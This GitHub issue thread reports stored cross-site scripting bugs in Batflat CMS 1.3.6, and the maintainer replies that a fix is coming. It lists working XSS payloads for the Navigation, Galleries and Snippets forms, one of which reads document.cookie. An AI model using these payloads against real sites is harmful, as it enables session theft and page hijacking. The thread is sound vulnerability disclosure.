### ISSUE TITLE
Multiple Stored XSS Cross-Site Scripting on Batflat CMS 1.3.6

### ISSUE THREAD

**Issue by Tadjmen** [sruupl/batflat#105]
Multiple Stored XSS Cross-Site Scripting on Batflat CMS 1.3.6

Login with editor account with rights to Navigation, Galleries, Snippets

<h2>Navigation</h2>

```
Add link
payload: "><img src=x onerror=alert(document.cookie)>
```

![image](https://user-images.githubusercontent.com/25518949/108699235-8fbb4d00-7537-11eb-83d8-c4012dc8c820.png)

Code being executed:

![image](https://user-images.githubusercontent.com/25518949/108699465-dad56000-7537-11eb-9e69-86567549fdde.png)

<h2>Galleries</h2>

```
Add gallery
payload: mlem"><svg/onload=alert(1)>
```

![image](https://user-images.githubusercontent.com/25518949/108699677-212abf00-7538-11eb-97f5-e7cfe0241e39.png)

Code being executed:

![image](https://user-images.githubusercontent.com/25518949/108699753-3e5f8d80-7538-11eb-8e5d-0853077eb2e2.png)

<h2>Snippets</h2>

```
Add Snippets
payload: mlem"><svg/onload=alert("TuongNC")>
```

![image](https://user-images.githubusercontent.com/25518949/108700130-bded5c80-7538-11eb-829b-3440ca0fbce0.png)

Code being executed:
![image](https://user-images.githubusercontent.com/25518949/108700016-9bf3da00-7538-11eb-825f-b825eac88f36.png)

**Comment by michu2k** [comment]
Thanks for reporting the problem!
Fixes will be available in the next update.
